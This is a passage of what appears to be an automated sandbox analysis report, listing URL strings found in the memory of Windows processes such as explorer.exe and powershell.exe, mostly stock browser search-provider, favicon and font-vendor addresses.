Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000020.00000000.561193755.00000000075A0000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: RuntimeBroker.exe, 00000025.00000000.580472271.0000021913216000.00000004.00000001.sdmp String found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000020.00000000.561193755.00000000075A0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000017.00000002.586167297.000001F7DDF1E000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000020.00000002.707268029.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
